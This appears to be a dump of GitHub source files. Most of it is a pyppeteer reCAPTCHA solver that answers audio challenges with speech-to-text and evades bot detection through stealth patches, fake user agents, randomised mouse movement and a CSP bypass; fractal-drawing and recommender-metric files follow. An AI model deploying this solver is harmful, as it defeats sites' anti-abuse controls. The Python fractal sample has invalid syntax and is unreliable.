self.log('Try again Error!')\n except DownloadError:\n self.log('Download Error!')\n except ReloadError:\n self.log('Reload Error!')\n else:\n if not answer:\n continue\n else:\n if len(answer) < 4:\n continue\n await self.type_audio_response(answer)\n await self.click_verify()\n await asyncio.sleep(2.0) # Wait 2seg\n if start_url != self.page.url:\n return {'status': 'success'}\n try:\n result = await self.check_detection(self.animation_timeout)\n except TryAgain:\n continue\n except SafePassage:\n continue\n except Exception:\n raise ResolveMoreLater('You must solve more captchas.')\n else:\n return result\n else:\n return {\"status\": \"retries_exceeded\"}\n\n async def wait_for_audio_button(self):\n \"\"\"Wait for audio button to appear.\"\"\"\n try:\n await self.image_frame.waitForFunction(\n \"jQuery('#recaptcha-audio-button').length\",\n timeout=self.animation_timeout)\n except ButtonError:\n raise ButtonError(\"Audio button missing, aborting\")\n except Exception as ex:\n self.log(ex)\n raise Exception(ex)\n\n async def click_tile(self):\n \"\"\"Click random title for bypass detection\"\"\"\n self.log(\"Clicking random tile\")\n tiles = await self.image_frame.JJ(\".rc-imageselect-tile\")\n await self.click_button(random.choice(tiles))\n\n async def click_audio_button(self):\n \"\"\"Click audio button after it appears.\"\"\"\n audio_button = await self.image_frame.J(\"#recaptcha-audio-button\")\n await self.click_button(audio_button)\n try:\n result = await 
self.check_detection(self.animation_timeout)\n except SafePassage:\n pass\n else:\n return result\n\n async def get_audio_response(self):\n \"\"\"Download audio data then send to speech-to-text API for answer\"\"\"\n try:\n audio_url = await self.image_frame.evaluate('jQuery(\"#audio-source\").attr(\"src\")')\n if not isinstance(audio_url, str):\n raise DownloadError(f\"Audio url is not valid, expected `str` instead received {type(audio_url)}\")\n except CancelledError:\n raise DownloadError(\"Audio url not found, aborting\")\n\n self.log(\"Downloading audio file ...\")\n try:\n if self.debug:\n self.log(\"audio file: {0}\".format(str(audio_url)))\n # Get the challenge audio to send to Google\n audio_data = await self.loop.create_task(\n util.get_page(audio_url, proxy=self.proxy, proxy_auth=self.proxy_auth, binary=True,\n timeout=self.page_load_timeout))\n self.log(\"Downloaded audio file!\")\n except ClientError as e:\n self.log(f\"Error `{e}` occured during audio download, retrying\")\n else:\n answer = await self.get_answer(audio_data, self.service)\n if answer is not None:\n self.log(f'Received answer \"{answer}\"')\n return answer\n elif self.service is self.speech_service.lower():\n return None # Secondary Recognition\n\n self.log(\"No answer, reloading\")\n await self.click_reload_button()\n func = (\n f'\"{audio_url}\" !== '\n f'jQuery(\".rc-audiochallenge-tdownload-link\").attr(\"href\")')\n try:\n await self.image_frame.waitForFunction(\n func, timeout=self.animation_timeout)\n except TimeoutError:\n raise ReloadError(\"Download link never updated\")\n\n async def type_audio_response(self, answer):\n \"\"\"Enter answer text on input\"\"\"\n self.log(\"Waiting audio response\")\n response_input = None\n for i in range(4):\n response_input = await self.image_frame.J(\"#audio-response\")\n if response_input:\n break\n await asyncio.sleep(2.0) # Wait 2seg\n self.log(\"Typing audio response\")\n length = random.uniform(70, 130)\n try:\n await self.loop.create_task(response_input.type(text=answer, delay=length))\n except Exception:\n raise TryAgain('Try again later')\n\n async def get_answer(self, audio_data, service):\n \"\"\"Get answer text from API selected (Primary and Secondary)\"\"\"\n self.log('Initialize a new recognizer')\n if service == \"google\":\n self.log('Using Google Speech Recognition')\n speech = Google()\n else:\n self.log('Using Wit.AI Recognition')\n speech = WitAI()\n tmpd = tempfile.mkdtemp()\n tmpf = os.path.join(tmpd, \"audio.mp3\")\n await util.save_file(tmpf, data=audio_data, binary=True)\n answer = await self.loop.create_task(speech.get_text(tmpf))\n shutil.rmtree(tmpd)\n return answer\n\n"
},
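`solve_by_audio` above alternates the primary and secondary recognizers by swapping two attributes every iteration. A sketch of the same round-robin expressed with `itertools.cycle`, as an alternative design; the service names are the two the module actually dispatches on.

```python
from itertools import cycle

services = cycle(["google", "wit.ai"])  # primary first, then alternate

for attempt in range(8):
    service = next(services)
    # ...download the audio, then dispatch to Google() or WitAI() on `service`
    print(f"attempt {attempt}: using {service}")
```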
{
"alpha_fraction": 0.591821551322937,
"alphanum_fraction": 0.5921933054924011,
"avg_line_length": 36.887325286865234,
"blob_id": "6bf89be13ed349bcf5df0b3fc3042b5d56358ea1",
"content_id": "9fff6659b70f3aa25f573865422aa9ba477ccd0f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5380,
"license_type": "no_license",
"max_line_length": 189,
"num_lines": 142,
"path": "/captcha_solver/solver.py",
"repo_name": "e2pluginss/Pypuppeteer_Captcha_Solver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\" Solver module. \"\"\"\n\nimport sys\nimport time\nimport traceback\n\nfrom pyppeteer.errors import NetworkError, PageError, PyppeteerError\nfrom pyppeteer.util import merge_dict\n\nfrom captcha_solver import util\nfrom captcha_solver.audio import SolveAudio\nfrom captcha_solver.base import Base\nfrom captcha_solver.exceptions import SafePassage, ButtonError, IframeError, TryAgain, ResolveMoreLater\n\n\nclass Solver(Base):\n def __init__(self, pageurl, loop=None, proxy=None, proxy_auth=None, options=None, lang='en-US', chromePath=None, **kwargs):\n self.url = pageurl\n self.loop = loop or util.get_event_loop()\n self.proxy = proxy\n self.proxy_auth = proxy_auth\n self.options = merge_dict({} if options is None else options, kwargs)\n self.chromePath = chromePath\n\n super(Solver, self).__init__(loop=loop, proxy=proxy, proxy_auth=proxy_auth, language=lang, options=options, chromePath=chromePath)\n\n async def start(self):\n \"\"\"Begin solving\"\"\"\n start = time.time()\n result = None\n try:\n self.browser = await self.get_new_browser()\n self.context = await self.browser.createIncognitoBrowserContext()\n await self.open_page(self.url, new_page=False) # Use first page\n result = await self.solve()\n except NetworkError as ex:\n traceback.print_exc(file=sys.stdout)\n print(f\"Network error: {ex}\")\n except ResolveMoreLater as ex:\n traceback.print_exc(file=sys.stdout)\n print(f\"Resolve More Captcha error: {ex}\")\n except TryAgain as ex:\n traceback.print_exc(file=sys.stdout)\n print(f\"Try Again error: {ex}\")\n except TimeoutError as ex:\n traceback.print_exc(file=sys.stdout)\n print(f\"Error timeout: {ex}\")\n except PageError as ex:\n traceback.print_exc(file=sys.stdout)\n print(f\"Page Error: {ex}\")\n except IframeError as ex:\n print(f\"IFrame error: {ex}\")\n except PyppeteerError as ex:\n traceback.print_exc(file=sys.stdout)\n print(f\"Pyppeteer error: {ex}\")\n except Exception as ex:\n traceback.print_exc(file=sys.stdout)\n print(f\"Error unexpected: {ex}\")\n finally:\n # Close all Context and Browser\n if self.context:\n await self.context.close()\n self.context = None\n if self.browser:\n await self.browser.close()\n self.browser = None\n await self.cleanup()\n # Return result\n if isinstance(result, dict):\n status = result['status'].capitalize()\n print(f\"Result: {status}\")\n elapsed = time.time() - start\n print(f\"Time elapsed: {elapsed}\")\n return result\n\n async def solve(self):\n \"\"\"Click checkbox, otherwise attempt to decipher image/audio\"\"\"\n self.log('Solving ...')\n try:\n await self.get_frames()\n except Exception:\n return await self.get_code({'status': 'success'})\n self.log('Wait for CheckBox ...')\n await self.loop.create_task(self.wait_for_checkbox())\n self.log('Click CheckBox ...')\n await self.click_checkbox()\n try:\n result = await self.loop.create_task(\n self.check_detection(self.animation_timeout)) # Detect Detection or captcha finish\n except SafePassage:\n return await self._solve() # Start to solver\n else:\n return self.get_code(result)\n\n async def _solve(self):\n self.log('Using Audio Solver')\n self.audio = SolveAudio(page=self.page, image_frame=self.image_frame, loop=self.loop, proxy=self.proxy, proxy_auth=self.proxy_auth, options=self.options, chromePath=self.chromePath)\n solve = self.audio.solve_by_audio\n try:\n result = await self.loop.create_task(solve())\n return await self.get_code(result)\n except PyppeteerError as ex:\n raise TryAgain(ex)\n\n async def 
get_code(self, result_status):\n if result_status[\"status\"] == \"success\":\n code = await self.g_recaptcha_response()\n if code:\n result_status[\"code\"] = code\n return result_status\n else:\n return result_status\n\n async def wait_for_checkbox(self):\n \"\"\"Wait for checkbox to appear.\"\"\"\n try:\n await self.checkbox_frame.waitForFunction(\n \"jQuery('#recaptcha-anchor').length\",\n timeout=self.animation_timeout)\n except ButtonError:\n raise ButtonError(\"Checkbox missing, aborting\")\n except Exception as ex:\n self.log(ex)\n await self.click_checkbox() # Try Click\n\n async def click_checkbox(self):\n \"\"\"Click checkbox on page load.\"\"\"\n try:\n checkbox = await self.checkbox_frame.J(\"#recaptcha-anchor\")\n await self.click_button(checkbox)\n except Exception as ex:\n self.log(ex)\n raise ex\n\n async def g_recaptcha_response(self):\n \"\"\"Result of captcha\"\"\"\n code = await self.page.evaluate(\n \"jQuery('#g-recaptcha-response').val()\")\n return code\n"
},
{
"alpha_fraction": 0.5763786435127258,
"alphanum_fraction": 0.5827181935310364,
"avg_line_length": 36.02572250366211,
"blob_id": "d55658c11cd2be20755de70050fee0b883e30b36",
"content_id": "db4796dcb928e687913aee8bae8959d8fa33b936",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11515,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 311,
"path": "/captcha_solver/base.py",
"repo_name": "e2pluginss/Pypuppeteer_Captcha_Solver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\" Base module. \"\"\"\nimport asyncio\nimport logging\nimport os\nimport random\nimport sys\nimport traceback\nfrom shutil import copyfile\n\nimport fuckcaptcha\nfrom fake_useragent import UserAgent\nfrom pyppeteer.errors import TimeoutError, PageError, PyppeteerError, NetworkError\nfrom pyppeteer.launcher import Launcher\nfrom pyppeteer.util import merge_dict\nfrom pyppeteer_stealth import stealth\n\nfrom captcha_solver import package_dir\nfrom captcha_solver.exceptions import SafePassage, TryAgain\nfrom captcha_solver.util import get_event_loop, load_file\n\nif len(logging.root.handlers) == 0:\n logging.basicConfig(format=\"%(asctime)s %(message)s\")\n\ntry:\n import yaml\n\n yaml.warnings({'YAMLLoadWarning': False})\n\n with open(\"captcha_solver.yaml\") as f:\n settings = yaml.load(f)\nexcept FileNotFoundError:\n logging.error(\n \"Solver can't run without a configuration file!\\n\"\n )\n\n copyfile(\n f\"{package_dir}/captcha_solver.example.yaml\", \"captcha_solver.example.yaml\")\n sys.exit(0)\n\n\nclass Base:\n \"\"\"Base control Pyppeteer\"\"\"\n\n browser = None\n context = None\n launcher = None\n page = None\n page_index = 0\n loop = None\n\n # Import configurations\n logger = logging.getLogger(__name__)\n debug = settings[\"debug\"]\n if debug:\n logger.setLevel(\"DEBUG\")\n headless = settings[\"headless\"]\n keyboard_traverse = settings[\"keyboard_traverse\"]\n page_load_timeout = settings[\"timeout\"][\"page_load\"] * 1000\n click_timeout = settings[\"timeout\"][\"click\"] * 1000\n animation_timeout = settings[\"timeout\"][\"animation\"] * 1000\n speech_service = settings[\"speech\"][\"service\"]\n speech_secondary_service = settings[\"speech\"][\"secondary_service\"]\n jquery_data = os.path.join(package_dir, settings[\"data\"][\"jquery_js\"])\n\n def __init__(self, loop=None, proxy=None, proxy_auth=None, options=None, language='en-US', chromePath=None, **kwargs):\n self.options = merge_dict({} if options is None else options, kwargs)\n self.loop = loop or get_event_loop()\n self.proxy = proxy\n self.proxy_auth = proxy_auth\n self.language = language\n self.chromePath = chromePath\n\n import pyppdf.patch_pyppeteer # Patch Pyppeter (Fix InvalidStateError and Download Chrome)\n\n async def get_frames(self):\n \"\"\"Get frames to checkbox and image_frame of reCaptcha\"\"\"\n self.checkbox_frame = next(frame for frame in self.page.frames if \"api2/anchor\" in frame.url)\n self.image_frame = next(frame for frame in self.page.frames if \"api2/bframe\" in frame.url)\n\n async def click_reload_button(self):\n \"\"\"Click reload button\"\"\"\n self.log('Click reload ...')\n reload_button = await self.image_frame.J(\"#recaptcha-reload-button\")\n await self.click_button(reload_button)\n await asyncio.sleep(self.click_timeout / 1000) # Wait for animations (Change other images)\n\n async def check_detection(self, timeout):\n \"\"\"Checks if \"Try again later\", \"please solve more\" modal appears or success\"\"\"\n\n func = \"\"\"(function() {\n checkbox_frame = parent.window.jQuery(\n \"iframe[src*='api2/anchor']\").contents();\n image_frame = parent.window.jQuery(\n \"iframe[src*='api2/bframe']\").contents();\n\n var bot_header = jQuery(\".rc-doscaptcha-header-text\", image_frame)\n if(bot_header.length){\n if(bot_header.text().indexOf(\"Try again later\") > -1){\n parent.window.wasdetected = true;\n return true;\n }\n }\n\n var try_again_header = jQuery(\n \".rc-audiochallenge-error-message\", image_frame)\n 
if(try_again_header.length){\n if(try_again_header.text().indexOf(\"please solve more\") > -1){\n try_again_header.text('Trying again...')\n parent.window.tryagain = true;\n return true;\n }\n }\n\n var checkbox_anchor = jQuery(\".recaptcha-checkbox\", checkbox_frame);\n if(checkbox_anchor.attr(\"aria-checked\") === \"true\"){\n parent.window.success = true;\n return true;\n }\n\n})()\"\"\"\n try:\n await self.page.waitForFunction(func, timeout=timeout)\n except asyncio.TimeoutError:\n raise SafePassage()\n except Exception as ex:\n self.log('FATAL ERROR: {0}'.format(ex))\n else:\n status = '?'\n if await self.page.evaluate(\"parent.window.wasdetected === true;\"):\n status = \"detected\"\n elif await self.page.evaluate(\"parent.window.success === true\"):\n status = \"success\"\n elif await self.page.evaluate(\"parent.window.tryagain === true\"):\n await self.page.evaluate(\"parent.window.tryagain = false;\")\n raise TryAgain()\n return {\"status\": status}\n\n async def click_verify(self):\n \"\"\"Click button of Verify\"\"\"\n self.log('Verifying ...')\n element = await self.image_frame.querySelector('#recaptcha-verify-button')\n try:\n await self.click_button(element)\n await asyncio.sleep(self.click_timeout / 1000) # Wait for animations (Change other images)\n except Exception as ex:\n self.log(ex)\n raise Exception(ex)\n\n async def click_button(self, button):\n \"\"\"Click button object\"\"\"\n if self.keyboard_traverse:\n bb = await button.boundingBox()\n await self.page.mouse.move(\n random.uniform(0, 800),\n random.uniform(0, 600),\n steps=int(random.uniform(40, 90))\n )\n await self.page.mouse.move(\n bb[\"x\"], bb[\"y\"], steps=int(random.uniform(40, 90))\n )\n await button.hover()\n await asyncio.sleep(random.uniform(0, 2))\n click_delay = random.uniform(30, 170)\n await button.click(delay=click_delay)\n\n async def open_page(self, url, cookies=None, new_page=True):\n \"\"\"Create new page\"\"\"\n if new_page:\n self.page_index += 1 # Add Actual Index\n self.page = await self.context.newPage()\n if self.proxy_auth and self.proxy:\n await self.page.authenticate(self.proxy_auth)\n self.log(f\"Open page with proxy {self.proxy}\")\n await self.set_bypass_csp() # Set Bypass Enable\n await self.set_cookies(cookies) # Set Cookies\n await self.on_goto()\n await stealth(self.page) # Headless Browser prevent detection\n await self.goto(url) # Go to page\n await self.on_start()\n\n async def goto(self, url):\n \"\"\"Navigate to address\"\"\"\n jquery_js = await load_file(self.jquery_data)\n await self.page.evaluateOnNewDocument(\"() => {\\n%s}\" % jquery_js) # Inject JQuery\n await self.page.setExtraHTTPHeaders({'Accept-Language': self.language}) # Forced set Language\n await fuckcaptcha.bypass_detections(self.page) # bypass reCAPTCHA detection in pyppeteer\n retry = 3 # Go to Page and Retry 3 times\n while True:\n try:\n await self.loop.create_task(self.page.goto(\n url, timeout=self.page_load_timeout * 1000,\n waitUntil=[\"networkidle0\", \"domcontentloaded\"]\n ))\n break\n except asyncio.TimeoutError as ex:\n traceback.print_exc(file=sys.stdout)\n self.log('Error timeout: ' + str(ex) + ' retry ' + str(retry))\n if retry > 0:\n retry -= 1\n else:\n raise TimeoutError(\"Page loading timed-out\")\n except PyppeteerError as ex:\n traceback.print_exc(file=sys.stdout)\n self.log(f\"Pyppeteer error: {ex}\")\n if retry > 0:\n retry -= 1\n else:\n raise ex\n except Exception as ex:\n traceback.print_exc(file=sys.stdout)\n self.log('Error unexpected: ' + str(ex) + ' retry ' + str(retry))\n if 
retry > 0:\n retry -= 1\n else:\n raise PageError(f\"Page raised an error: `{ex}`\")\n\n async def get_new_browser(self):\n \"\"\"Get a new browser, set proxy and arguments\"\"\"\n agent = UserAgent(verify_ssl=False).random\n args = [\n '--cryptauth-http-host \"\"',\n '--disable-accelerated-2d-canvas',\n '--disable-background-networking',\n '--disable-background-timer-throttling',\n '--disable-browser-side-navigation',\n '--disable-client-side-phishing-detection',\n '--disable-default-apps',\n '--disable-dev-shm-usage',\n '--disable-device-discovery-notifications',\n '--disable-extensions',\n '--disable-features=site-per-process',\n '--disable-hang-monitor',\n '--disable-java',\n '--disable-popup-blocking',\n '--disable-prompt-on-repost',\n '--disable-setuid-sandbox',\n '--disable-sync',\n '--disable-translate',\n '--disable-web-security',\n '--disable-webgl',\n '--metrics-recording-only',\n '--no-first-run',\n '--safebrowsing-disable-auto-update',\n '--no-sandbox',\n # Automation arguments\n '--enable-automation',\n '--password-store=basic',\n '--use-mock-keychain',\n '--lang=\"{0}\"'.format(self.language),\n '--user-agent=\"{0}\"'.format(agent)]\n if self.proxy:\n args.append(f\"--proxy-server={self.proxy}\")\n if \"args\" in self.options:\n args.extend(self.options.pop(\"args\"))\n self.options.update({\n \"headless\": self.headless,\n \"args\": args,\n # Silence Pyppeteer logs\n \"logLevel\": \"CRITICAL\"})\n if self.chromePath:\n self.options.update({\n \"executablePath\": self.chromePath,\n })\n self.launcher = Launcher(self.options, handleSIGINT=False, handleSIGTERM=False, handleSIGHUP=False)\n browser = await self.launcher.launch()\n # Set user-agent to all pages\n pages = await browser.pages()\n for page in pages:\n await page.setUserAgent(agent)\n self.page = pages[0] # Set first page\n return browser\n\n\n async def set_cookies(self, cookies=None):\n \"\"\"Set cookie list to current page\"\"\"\n if cookies:\n for cookie in cookies:\n cookie['url'] = self.page.url\n await self.page.setCookie(cookie)\n\n async def wait_load(self, waitUntil='load'):\n \"\"\"Wait for Navigation\"\"\"\n await self.page.waitForNavigation({'waitUntil': waitUntil})\n\n async def cleanup(self):\n \"\"\"Kill Browser\"\"\"\n if self.launcher:\n await self.launcher.killChrome()\n self.log('Browser closed')\n\n async def set_bypass_csp(self):\n \"\"\"Enable bypassing of page's Content-Security-Policy.\"\"\"\n await self.page._client.send(\"Page.setBypassCSP\", {'enabled': True})\n\n async def on_goto(self):\n \"\"\"Run before to open URL\"\"\"\n pass\n\n async def on_start(self):\n \"\"\"Run after to open URL\"\"\"\n pass\n\n async def on_finish(self):\n \"\"\"Run after to finish the process\"\"\"\n pass\n\n def log(self, message):\n self.logger.debug(f\"[{self.page_index}] {message}\")\n"
}
] | 7 |
4eckme/Tetrascope
|
https://github.com/4eckme/Tetrascope
|
95b2429c370de755ee9e0baaee8f8d00d83c118f
|
803dfdef60e1d894e489a9e59494a5fd5774801b
|
ed3d1fcb23bbde5583c641fa7a8ecdaa6dbf7d5d
|
refs/heads/main
| 2023-01-23T10:09:16.674880 | 2020-12-07T01:13:59 | 2020-12-07T01:13:59 | 318,666,799 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.48426395654678345,
"alphanum_fraction": 0.5147207975387573,
"avg_line_length": 23.625,
"blob_id": "fcbf7674561f20532a3b080495338f959ed714b6",
"content_id": "453cb6633a8ed0886700e68b5adcd7664bd4ff95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 985,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 40,
"path": "/tetrascope.sample.py",
"repo_name": "4eckme/Tetrascope",
"src_encoding": "UTF-8",
"text": "// Tetrascope sample\n// R=1024px, scale=100%\n\nimport numpy as np\nfrom PIL import Image\n \nR = 1024\nD = 2*R+1\n \ndef hex_to_rgb(value):\n lv = len(value)\n return tuple(int(value[i:i + lv // 3], 16) for i in range(0, lv, lv // 3))\n \ndef hex_to_str(c):\n c = c.lstrip('0x')\n if len(c) <= 6:\n return c.ljust(6, '0')\n else:\n return c.substring(0, 6)\n \ndata = np.zeros((D,D,3), dtype=np.uint8)\nsqrR = R*R\nfor x in range(0, R):\n if not x % 128:\n print(x, \" rows rendered\")\n for y in range (x, R):\n sqr = (x*x+y*y)\n if sqr <= sqrR:\n rgbtuple = hex_to_rgb(hex_to_str(hex(sqr)))\n data[R+x,R+y] = rgbtuple\n data[R+x,R-y] = rgbtuple\n data[R-x,R+y] = rgbtuple\n data[R-x,R-y] = rgbtuple\n data[R+y,R+x] = rgbtuple\n data[R+y,R-x] = rgbtuple\n data[R-y,R+x] = rgbtuple\n data[R-y,R-x] = rgbtuple\n \nimg = Image.fromarray(data)\nimg.save(\"tetrascope.png\")\n"
},
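The sampler above colors each pixel by interpreting the squared radius x²+y² as a six-digit hex color, right-padded with zeros. Tracing one pixel through the fixed helpers makes the mapping concrete:

```python
# Pixel offset (x, y) = (10, 20) relative to the image centre:
sqr = 10*10 + 20*20                                  # 500
h = hex(sqr)[2:].ljust(6, '0')                       # '1f4' -> '1f4000'
rgb = tuple(int(h[i:i + 2], 16) for i in range(0, 6, 2))
print(rgb)                                           # (31, 64, 0)
```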
{
"alpha_fraction": 0.5537459254264832,
"alphanum_fraction": 0.5586318969726562,
"avg_line_length": 28.238094329833984,
"blob_id": "2e9f96782c248b88f620d4b8b2c43f6373ceba6d",
"content_id": "4185d9bde8e8f85fac89296e25e8bb8a76265f00",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 614,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 21,
"path": "/README.md",
"repo_name": "4eckme/Tetrascope",
"src_encoding": "UTF-8",
"text": "# Tetrascope collection\n\nMath formula for pixels X11 color hex code:\n* tetrascope.math.svg - (x, y: position relative to central pixel of image)\n\n-------------------------------------------------------\n\nSimple fractal generator:\n* tetrascope.sample.go - for Go\n* tetrascope.sample.py - for Python\n\n-------------------------------------------------------\n\nGenerated image:\n* tetrascope.png\n\n-------------------------------------------------------\n\nAnimation of tetrascope scaling:\n* tetrascope.play.js - available to execute in browser console\n* tetrascope.play.glsl - preview https://www.shadertoy.com/view/wscBD2\n"
},
{
"alpha_fraction": 0.46691519021987915,
"alphanum_fraction": 0.518173336982727,
"avg_line_length": 40.269229888916016,
"blob_id": "bacb5ba391108a2c41ce984fe5b622b0f6be362c",
"content_id": "a496a4fd3222b68f31af21d4f65389efb82cdd42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1073,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 26,
"path": "/tetrascope.play.js",
"repo_name": "4eckme/Tetrascope",
"src_encoding": "UTF-8",
"text": "// Tetrascope fractal animation\n// Availiable to execute in browser console\n// For base tetrascope image set R=1024, n=1\n(function(){ var R = 256; var D=2*R+1;\nvar pow = Math.pow; var floor=Math.floor; var ceil=Math.ceil; var log2 = Math.log2;\nvar rgb = function(x, y, n){ return floor( (x*x*n+y*y*n)*pow(16, ( 6-ceil(log2(x*x*n+y*y*n)/4)) ) ); }\ndocument.body.innerHTML=('<canvas id=\"C\" width=\"'+D+'\" height=\"'+D+'\"></canvas>');\nvar canvas = document.getElementById('C');\nvar ctx = canvas.getContext('2d');\nwindow.n=0; var si = setInterval(function () {\n window.n += 1;\n for(var x = 0;x<=R;x++) {\n for(var y = 0;y<=R;y++) {\n ctx.fillStyle='#'+rgb(x, y, n).toString(16); \n if (x===0&&y===0) ctx.fillStyle=\"#000000\";\n var X1 = R-x;\n var Y1 = R-y;\n var X2 = R+x;\n var Y2 = R+y;\n if ( ( x*x+y*y ) < R*R ) { \n ctx.fillRect(X1, Y1, 1, 1);\n ctx.fillRect(X1, Y2, 1, 1);\n ctx.fillRect(X2, Y1, 1, 1);\n ctx.fillRect(X2, Y2, 1, 1);\n} } } }, 100);\n})();\n"
},
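The animation's `rgb` helper rescales `x*x*n + y*y*n` so its leading hex digit always lands in the top colour nibble: `ceil(log2(s)/4)` counts the hex digits of `s`, and multiplying by `16^(6 - digits)` left-justifies the value inside a six-digit colour. The same normalization, sketched in Python for clarity (the JS special-cases x = y = 0, where log2 is undefined):

```python
from math import ceil, floor, log2

def rgb(x, y, n):
    s = (x*x + y*y) * n
    # number of hex digits of s, then shift to fill six digits
    return floor(s * 16 ** (6 - ceil(log2(s) / 4)))

print(hex(rgb(10, 20, 1)))  # 0x1f4000 -- matches the static render above
```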
{
"alpha_fraction": 0.4237510859966278,
"alphanum_fraction": 0.46231377124786377,
"avg_line_length": 23.80434799194336,
"blob_id": "108aaa1ab70d45afee79c7cc98bca6ec89b01e20",
"content_id": "2197568cf6a924b52b2b1a3f8624f5ca288306be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Go",
"length_bytes": 2282,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 92,
"path": "/tetrascope.sample.go",
"repo_name": "4eckme/Tetrascope",
"src_encoding": "UTF-8",
"text": "//Tetrascope sample\n//R=1024px, scale=100%\n\npackage main\n\nimport (\n \"image\"\n \"image/color\"\n \"image/draw\"\n \"image/png\"\n \"os\"\n \"strings\"\n \"strconv\"\n)\n\nfunc ConvertToColor(s string) (r string) {\n\n r = s\n if len(s)<6 {\n r = s+strings.Repeat(\"0\", 6-len(s))\n } else if len(s)>6 {\n r = string(s[0:6])\n }\n return r\n}\n\nfunc ParseHexColorFast(s string) (c color.RGBA) {\n\n c.A = 0xff\n\n if s[0] != '#' {\n return c\n }\n\n hexToByte := func(b byte) byte {\n switch {\n case b >= '0' && b <= '9':\n return b - '0'\n case b >= 'a' && b <= 'f':\n return b - 'a' + 10\n case b >= 'A' && b <= 'F':\n return b - 'A' + 10\n }\n return 0\n }\n\n c.R = hexToByte(s[1])<<4 + hexToByte(s[2])\n c.G = hexToByte(s[3])<<4 + hexToByte(s[4])\n c.B = hexToByte(s[5])<<4 + hexToByte(s[6])\n\n return\n}\n\nfunc main() {\n \n R:=1024\n D:=R*2+1; \n new_png_file := \"tetrascope.png\"\n \n myimage := image.NewRGBA(image.Rect(0, 0, D, D))\n bgcolor := color.RGBA{0, 0, 0, 0}\n draw.Draw(myimage, myimage.Bounds(), &image.Uniform{bgcolor}, image.ZP, draw.Src)\n\n for x:=0; x<=R; x++ {\n for y:=0; y<=R; y++ {\n x1 := R-x\n x2 := R+x\n y1 := R-y\n y2 := R+y\n if x*x+y*y <= R*R {\n var c int64; \n c = int64(x*x+y*y);\n col := \"#\"+ConvertToColor(strconv.FormatInt(c, 16))\n color := ParseHexColorFast(col)\n pixel1 := image.Rect(x1, y1, x1+1, y1+1)\n pixel2 := image.Rect(x1, y2, x1+1, y2+1)\n pixel3 := image.Rect(x2, y1, x2+1, y1+1)\n pixel4 := image.Rect(x2, y2, x2+1, y2+1)\n draw.Draw(myimage, pixel1, &image.Uniform{color}, image.ZP, draw.Src)\n draw.Draw(myimage, pixel2, &image.Uniform{color}, image.ZP, draw.Src)\n draw.Draw(myimage, pixel3, &image.Uniform{color}, image.ZP, draw.Src)\n draw.Draw(myimage, pixel4, &image.Uniform{color}, image.ZP, draw.Src)\n }\n } \n }\n\n myfile, err := os.Create(new_png_file)\n if err != nil {\n panic(err)\n }\n png.Encode(myfile, myimage)\n}\n"
}
] | 4 |
dmitrydoni/gb-recommendation-systems
|
https://github.com/dmitrydoni/gb-recommendation-systems
|
157ffd65ca4ecf1a33b952b9c1989ea8c0cd0790
|
80200c2e6777873b9f1d9e51594fd86811248ef9
|
29eed468dd48c68ad5443dea690d2acc418927cb
|
refs/heads/master
| 2022-09-07T16:50:53.807963 | 2020-06-01T10:46:00 | 2020-06-01T10:46:00 | 265,688,555 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6257046461105347,
"alphanum_fraction": 0.6295377612113953,
"avg_line_length": 25.5508975982666,
"blob_id": "979fa163ef13574bf00c3e4adb0d68933e4dd1d3",
"content_id": "a9fd8d7b7f1841ebe0d6ee96dd3c425b217929e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4441,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 167,
"path": "/src/metrics.py",
"repo_name": "dmitrydoni/gb-recommendation-systems",
"src_encoding": "UTF-8",
"text": "def hit_rate(recommended_list, bought_list):\n \"\"\"Hit rate\"\"\"\n \n bought_list = np.array(bought_list)\n recommended_list = np.array(recommended_list)\n \n flags = np.isin(bought_list, recommended_list)\n \n hit_rate = (flags.sum() > 0) * 1\n \n return hit_rate\n\n\ndef hit_rate_at_k(recommended_list, bought_list, k=5):\n \"\"\"Hit rate@k\"\"\"\n \n bought_list = np.array(bought_list)\n recommended_list_top_k = np.array(recommended_list[:k])\n \n flags = np.isin(bought_list, recommended_list_top_k)\n \n hit_rate_at_k = (flags.sum() > 0) * 1\n \n return hit_rate_at_k\n\n\ndef precision(recommended_list, bought_list):\n \"\"\"Precision\"\"\"\n \n bought_list = np.array(bought_list)\n recommended_list = np.array(recommended_list)\n \n flags = np.isin(bought_list, recommended_list)\n \n precision = flags.sum() / len(recommended_list)\n \n return precision\n\n\ndef precision_at_k(recommended_list, bought_list, k=5):\n \"\"\"Precision@k\"\"\"\n \n bought_list = np.array(bought_list)\n recommended_list = np.array(recommended_list)\n \n bought_list = bought_list # Тут нет [:k] !!\n recommended_list = recommended_list[:k]\n \n flags = np.isin(bought_list, recommended_list)\n \n precision_at_k = flags.sum() / len(recommended_list)\n \n return precision_at_k\n\n\ndef money_precision_at_k(recommended_list, bought_list, prices_recommended, k=5):\n \"\"\"Money Precision@k\"\"\"\n \n bought_list = np.array(bought_list)\n recommended_list = np.array(recommended_list)\n prices_recommended = np.array(prices_recommended)\n \n bought_list = bought_list\n recommended_list = recommended_list[:k]\n prices_recommended = prices_recommended[:k]\n \n flags = np.isin(recommended_list, bought_list)\n k_ones = np.ones(k)\n \n # Calculate scalar products\n revenue_k_recommended_relevant = np.dot(flags[:k], prices_recommended)\n revenue_k_recommended = np.dot(k_ones, prices_recommended)\n \n money_precision_at_k = revenue_k_recommended_relevant / revenue_k_recommended\n \n 